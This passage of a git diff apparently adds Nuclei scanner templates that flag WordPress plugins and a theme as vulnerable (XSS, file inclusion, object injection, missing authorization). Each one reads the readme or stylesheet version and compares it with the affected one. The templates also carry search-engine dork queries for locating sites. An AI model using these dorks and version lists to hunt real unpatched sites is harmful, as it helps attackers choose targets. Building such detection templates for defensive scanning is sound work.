diff --git a/poc/other/e2pdf-b0d40d85770d0e3959eca97a13f2f029.yaml b/poc/other/e2pdf-b0d40d85770d0e3959eca97a13f2f029.yaml
new file mode 100644
index 0000000000..fdada3f27c
--- /dev/null
+++ b/poc/other/e2pdf-b0d40d85770d0e3959eca97a13f2f029.yaml
@@ -0,0 +1,59 @@
+id: e2pdf-b0d40d85770d0e3959eca97a13f2f029
+
+info:
+ name: >
+ e2pdf <= 1.25.05 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/f94a1671-11f8-4a05-b950-a068edf29f43?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/e2pdf/"
+ google-query: inurl:"/wp-content/plugins/e2pdf/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,e2pdf,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/e2pdf/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "e2pdf"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.25.05')
\ No newline at end of file
diff --git a/poc/other/embedpress-63790850863aa3a88ecce00a79a7021b.yaml b/poc/other/embedpress-63790850863aa3a88ecce00a79a7021b.yaml
new file mode 100644
index 0000000000..bcfa9f40d4
--- /dev/null
+++ b/poc/other/embedpress-63790850863aa3a88ecce00a79a7021b.yaml
@@ -0,0 +1,59 @@
+id: embedpress-63790850863aa3a88ecce00a79a7021b
+
+info:
+ name: >
+ EmbedPress <= 4.0.9 - Unauthenticated Local File Inclusion
+ author: topscoder
+ severity: critical
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/21a1b117-945f-49bc-9ea1-313afa93bf32?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/embedpress/"
+ google-query: inurl:"/wp-content/plugins/embedpress/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,embedpress,critical
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/embedpress/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "embedpress"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 4.0.9')
\ No newline at end of file
diff --git a/poc/other/formfacade-48c25c5fd30ad0a0b1bed685bcfb7af4.yaml b/poc/other/formfacade-48c25c5fd30ad0a0b1bed685bcfb7af4.yaml
new file mode 100644
index 0000000000..d022c89006
--- /dev/null
+++ b/poc/other/formfacade-48c25c5fd30ad0a0b1bed685bcfb7af4.yaml
@@ -0,0 +1,59 @@
+id: formfacade-48c25c5fd30ad0a0b1bed685bcfb7af4
+
+info:
+ name: >
+ FormFacade <= 1.3.2 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/1d0166c9-1349-45df-9e0f-ff4bc1a67c73?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/formfacade/"
+ google-query: inurl:"/wp-content/plugins/formfacade/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,formfacade,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/formfacade/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "formfacade"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.3.2')
\ No newline at end of file
diff --git a/poc/other/givingpress-lite-f13848717586edd56855949bd81c07fd.yaml b/poc/other/givingpress-lite-f13848717586edd56855949bd81c07fd.yaml
new file mode 100644
index 0000000000..c581b7ce3f
--- /dev/null
+++ b/poc/other/givingpress-lite-f13848717586edd56855949bd81c07fd.yaml
@@ -0,0 +1,59 @@
+id: givingpress-lite-f13848717586edd56855949bd81c07fd
+
+info:
+ name: >
+ GivingPress Lite <= 1.8.6 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/69a14e2f-442e-421c-bf5d-0bff3b822911?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/themes/givingpress-lite/"
+ google-query: inurl:"/wp-content/themes/givingpress-lite/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-theme,givingpress-lite,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/themes/givingpress-lite/style.css"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "givingpress-lite"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.8.6')
\ No newline at end of file
diff --git a/poc/other/gutentor-d377e101a76164370c9cc0ec45a485ee.yaml b/poc/other/gutentor-d377e101a76164370c9cc0ec45a485ee.yaml
new file mode 100644
index 0000000000..80b1f4858f
--- /dev/null
+++ b/poc/other/gutentor-d377e101a76164370c9cc0ec45a485ee.yaml
@@ -0,0 +1,59 @@
+id: gutentor-d377e101a76164370c9cc0ec45a485ee
+
+info:
+ name: >
+ Gutentor - Gutenberg Blocks - Page Builder for Gutenberg Editor <= 3.3.5 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/c3b1ff70-7e37-4f74-bd72-ecda81d13d83?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/gutentor/"
+ google-query: inurl:"/wp-content/plugins/gutentor/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,gutentor,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/gutentor/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "gutentor"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.3.5')
\ No newline at end of file
diff --git a/poc/other/hr-management-eb3b99f576f6e9904bb734d15faf495b.yaml b/poc/other/hr-management-eb3b99f576f6e9904bb734d15faf495b.yaml
new file mode 100644
index 0000000000..9a1fece812
--- /dev/null
+++ b/poc/other/hr-management-eb3b99f576f6e9904bb734d15faf495b.yaml
@@ -0,0 +1,59 @@
+id: hr-management-eb3b99f576f6e9904bb734d15faf495b
+
+info:
+ name: >
+ Crew HRM <= 1.1.1 - Unauthenticated PHP Object Injection
+ author: topscoder
+ severity: critical
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/dc3e3d47-cae3-46a6-9b60-ad1eb6b7ced7?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/hr-management/"
+ google-query: inurl:"/wp-content/plugins/hr-management/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,hr-management,critical
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/hr-management/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "hr-management"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.1.1')
\ No newline at end of file
diff --git a/poc/other/html5-video-player-ca0016b58a304c45cd93a8c5f0474313.yaml b/poc/other/html5-video-player-ca0016b58a304c45cd93a8c5f0474313.yaml
new file mode 100644
index 0000000000..969777e2a1
--- /dev/null
+++ b/poc/other/html5-video-player-ca0016b58a304c45cd93a8c5f0474313.yaml
@@ -0,0 +1,59 @@
+id: html5-video-player-ca0016b58a304c45cd93a8c5f0474313
+
+info:
+ name: >
+ Flash & HTML5 Video <= 2.5.30 - Missing Authorization
+ author: topscoder
+ severity: high
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/84ce21b9-91ac-4990-8665-69a1461147ab?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/html5-video-player/"
+ google-query: inurl:"/wp-content/plugins/html5-video-player/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,html5-video-player,high
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/html5-video-player/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "html5-video-player"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.5.30')
\ No newline at end of file
diff --git a/poc/other/icegram-a0b801eb66ca58090afd94117ad9974e.yaml b/poc/other/icegram-a0b801eb66ca58090afd94117ad9974e.yaml
new file mode 100644
index 0000000000..ffe1c7b8fd
--- /dev/null
+++ b/poc/other/icegram-a0b801eb66ca58090afd94117ad9974e.yaml
@@ -0,0 +1,59 @@
+id: icegram-a0b801eb66ca58090afd94117ad9974e
+
+info:
+ name: >
+ Icegram <= 3.1.24 - Missing Authorization
+ author: topscoder
+ severity: high
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/990d62fd-dc55-446e-b3ff-52c7c121aeb8?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/icegram/"
+ google-query: inurl:"/wp-content/plugins/icegram/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,icegram,high
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/icegram/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "icegram"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.1.24')
\ No newline at end of file
diff --git a/poc/other/icegram-fdccf66c281808c211e00f643959c680.yaml b/poc/other/icegram-fdccf66c281808c211e00f643959c680.yaml
new file mode 100644
index 0000000000..1a9bdbe28c
--- /dev/null
+++ b/poc/other/icegram-fdccf66c281808c211e00f643959c680.yaml
@@ -0,0 +1,59 @@
+id: icegram-fdccf66c281808c211e00f643959c680
+
+info:
+ name: >
+ Icegram <= 3.1.25 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/230f40c1-a8a9-4932-a3f1-ecddc52acca9?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/icegram/"
+ google-query: inurl:"/wp-content/plugins/icegram/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,icegram,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/icegram/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "icegram"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.1.25')
\ No newline at end of file
diff --git a/poc/other/icegram-rainmaker-409f16694b32ad9df1caa739ea6dac70.yaml b/poc/other/icegram-rainmaker-409f16694b32ad9df1caa739ea6dac70.yaml
new file mode 100644
index 0000000000..3dd46d8435
--- /dev/null
+++ b/poc/other/icegram-rainmaker-409f16694b32ad9df1caa739ea6dac70.yaml
@@ -0,0 +1,59 @@
+id: icegram-rainmaker-409f16694b32ad9df1caa739ea6dac70
+
+info:
+ name: >
+ Icegram Collect – Easy Form, Lead Collection and Subscription plugin <= 1.3.14 - Missing Authorization
+ author: topscoder
+ severity: high
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/821e763a-fe84-4471-99d0-515e036122c0?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/icegram-rainmaker/"
+ google-query: inurl:"/wp-content/plugins/icegram-rainmaker/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,icegram-rainmaker,high
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/icegram-rainmaker/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "icegram-rainmaker"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.3.14')
\ No newline at end of file
diff --git a/poc/other/indeed-membership-pro-3298a85f8b58f139b4e851a0d9e6de1d.yaml b/poc/other/indeed-membership-pro-3298a85f8b58f139b4e851a0d9e6de1d.yaml
new file mode 100644
index 0000000000..1ccc8de18c
--- /dev/null
+++ b/poc/other/indeed-membership-pro-3298a85f8b58f139b4e851a0d9e6de1d.yaml
@@ -0,0 +1,59 @@
+id: indeed-membership-pro-3298a85f8b58f139b4e851a0d9e6de1d
+
+info:
+ name: >
+ Indeed Membership Pro <= 12.6 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/b7dce0db-792f-4be2-a55d-b4fb7442b548?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/indeed-membership-pro/"
+ google-query: inurl:"/wp-content/plugins/indeed-membership-pro/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,indeed-membership-pro,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/indeed-membership-pro/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "indeed-membership-pro"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 12.6')
\ No newline at end of file
diff --git a/poc/other/indeed-membership-pro-d0036f529101dc1ba27ca21f4e21299b.yaml b/poc/other/indeed-membership-pro-d0036f529101dc1ba27ca21f4e21299b.yaml
new file mode 100644
index 0000000000..90a3cbfbbf
--- /dev/null
+++ b/poc/other/indeed-membership-pro-d0036f529101dc1ba27ca21f4e21299b.yaml
@@ -0,0 +1,59 @@
+id: indeed-membership-pro-d0036f529101dc1ba27ca21f4e21299b
+
+info:
+ name: >
+ Indeed Membership Pro <= 12.6 - Unauthenticated PHP Object Injection
+ author: topscoder
+ severity: critical
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/12f314c5-ba73-4204-b276-904d9de7c099?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/indeed-membership-pro/"
+ google-query: inurl:"/wp-content/plugins/indeed-membership-pro/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,indeed-membership-pro,critical
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/indeed-membership-pro/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "indeed-membership-pro"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 12.6')
\ No newline at end of file
diff --git a/poc/other/indeed-membership-pro-ee7f04a1728a71ff455331ff4a5e274a.yaml b/poc/other/indeed-membership-pro-ee7f04a1728a71ff455331ff4a5e274a.yaml
new file mode 100644
index 0000000000..f84044c785
--- /dev/null
+++ b/poc/other/indeed-membership-pro-ee7f04a1728a71ff455331ff4a5e274a.yaml
@@ -0,0 +1,59 @@
+id: indeed-membership-pro-ee7f04a1728a71ff455331ff4a5e274a
+
+info:
+ name: >
+ Indeed Membership Pro <= 12.6 - Unauthenticated Privilege Escalation
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/3bb4a8ba-33f1-4183-be76-72f6a99fc1fa?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/indeed-membership-pro/"
+ google-query: inurl:"/wp-content/plugins/indeed-membership-pro/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,indeed-membership-pro,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/indeed-membership-pro/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "indeed-membership-pro"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 12.6')
\ No newline at end of file
diff --git a/poc/other/invite-anyone-7272ae1b7b7b371ddf8592123a11b2b2.yaml b/poc/other/invite-anyone-7272ae1b7b7b371ddf8592123a11b2b2.yaml
new file mode 100644
index 0000000000..f98a9bdd30
--- /dev/null
+++ b/poc/other/invite-anyone-7272ae1b7b7b371ddf8592123a11b2b2.yaml
@@ -0,0 +1,59 @@
+id: invite-anyone-7272ae1b7b7b371ddf8592123a11b2b2
+
+info:
+ name: >
+ Invite Anyone <= 1.4.7 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/b02613dc-8c31-4c86-b800-eb1039381e1f?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/invite-anyone/"
+ google-query: inurl:"/wp-content/plugins/invite-anyone/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,invite-anyone,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/invite-anyone/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "invite-anyone"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.4.7')
\ No newline at end of file
diff --git a/poc/other/learning-management-system-29aeba2a433f8692c0aacdf6d1ea6acb.yaml b/poc/other/learning-management-system-29aeba2a433f8692c0aacdf6d1ea6acb.yaml
new file mode 100644
index 0000000000..de36fa2948
--- /dev/null
+++ b/poc/other/learning-management-system-29aeba2a433f8692c0aacdf6d1ea6acb.yaml
@@ -0,0 +1,59 @@
+id: learning-management-system-29aeba2a433f8692c0aacdf6d1ea6acb
+
+info:
+ name: >
+ Masteriyo - LMS <= 1.11.4 - Authenticated (Student+) Insecure Direct Object Reference
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/c3d7a587-042d-4ba1-9373-aaeb24c711f5?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/learning-management-system/"
+ google-query: inurl:"/wp-content/plugins/learning-management-system/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,learning-management-system,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/learning-management-system/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "learning-management-system"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.11.4')
\ No newline at end of file
diff --git a/poc/other/mediavine-create-621425e43450aac270f2eee9af5c5ee9.yaml b/poc/other/mediavine-create-621425e43450aac270f2eee9af5c5ee9.yaml
new file mode 100644
index 0000000000..ce529c171e
--- /dev/null
+++ b/poc/other/mediavine-create-621425e43450aac270f2eee9af5c5ee9.yaml
@@ -0,0 +1,59 @@
+id: mediavine-create-621425e43450aac270f2eee9af5c5ee9
+
+info:
+ name: >
+ Create by Mediavine <= 1.9.8 - Unauthenticated Sensitive Information Exposure
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/8c04e40a-6d94-4688-9159-07bf27a9efe0?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/mediavine-create/"
+ google-query: inurl:"/wp-content/plugins/mediavine-create/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,mediavine-create,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/mediavine-create/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "mediavine-create"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.9.8')
\ No newline at end of file
diff --git a/poc/other/modal-window-d5049720f6b9e25c27b98f22996df247.yaml b/poc/other/modal-window-d5049720f6b9e25c27b98f22996df247.yaml
new file mode 100644
index 0000000000..48bbce8456
--- /dev/null
+++ b/poc/other/modal-window-d5049720f6b9e25c27b98f22996df247.yaml
@@ -0,0 +1,59 @@
+id: modal-window-d5049720f6b9e25c27b98f22996df247
+
+info:
+ name: >
+ Modal Window <= 6.0.3 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/7790777d-9421-48c6-b789-f1feab109ec7?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/modal-window/"
+ google-query: inurl:"/wp-content/plugins/modal-window/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,modal-window,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/modal-window/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "modal-window"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 6.0.3')
\ No newline at end of file
diff --git a/poc/other/mybooktable-4001d26bb4ecdae4d7bd52ea8c3e8769.yaml b/poc/other/mybooktable-4001d26bb4ecdae4d7bd52ea8c3e8769.yaml
new file mode 100644
index 0000000000..0417d8a614
--- /dev/null
+++ b/poc/other/mybooktable-4001d26bb4ecdae4d7bd52ea8c3e8769.yaml
@@ -0,0 +1,59 @@
+id: mybooktable-4001d26bb4ecdae4d7bd52ea8c3e8769
+
+info:
+ name: >
+ MyBookTable Bookstore <= 3.3.9 - Cross-Site Request Forgery
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/b614aab2-a3e3-410a-917b-cc33634503ce?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/mybooktable/"
+ google-query: inurl:"/wp-content/plugins/mybooktable/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,mybooktable,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
